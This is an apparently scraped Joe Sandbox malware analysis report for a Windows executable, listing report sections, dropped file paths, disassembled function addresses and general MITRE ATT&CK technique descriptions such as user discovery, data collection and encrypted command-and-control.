Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FG5wHs4fVX.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\04EL04J45

C:\Users\user\AppData\Local\Temp\Nasalis

C:\Users\user\AppData\Local\Temp\aut2815.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
FG5wHs4fVX.exe

Function 007642DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 007642A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 007A2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00762CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 007A065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0076344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00762B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00763170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 01243888 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00762C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 01243668 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140
fileCOMMON

Function 007D2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Function 00795AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Function 00763B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre